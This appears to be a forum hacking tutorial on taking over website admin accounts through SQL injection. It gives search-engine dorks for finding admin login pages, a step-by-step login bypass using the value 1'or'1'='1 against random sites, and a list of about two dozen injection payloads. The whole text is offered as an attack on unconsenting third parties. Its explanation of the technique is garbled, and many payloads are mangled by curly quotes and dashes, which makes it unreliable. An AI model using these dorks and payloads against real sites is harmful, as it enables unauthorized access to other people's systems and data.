We're gonna hack into an admin account, using SQL injections.
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Dorks:
- Code:
-
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx
Step 1: Go to
[You must be registered and logged in to see this link.] type in ''admin/login.asp site:net'' and search (You can also use the option, to search only in your country).
[You must be registered and logged in to see this image.]Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''
website.com/admin/login.asp''.
Step 3: Go to the website admin login page, type in:
- Code:
-
username: 1'or'1'='1
password: 1'or'1'='1
[You must be registered and logged in to see this image.]DONE! WE ARE NOW LOGGED AS ADMINISTRATOR !
[You must be registered and logged in to see this image.]Other Injection Queries:
- Code:
-
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a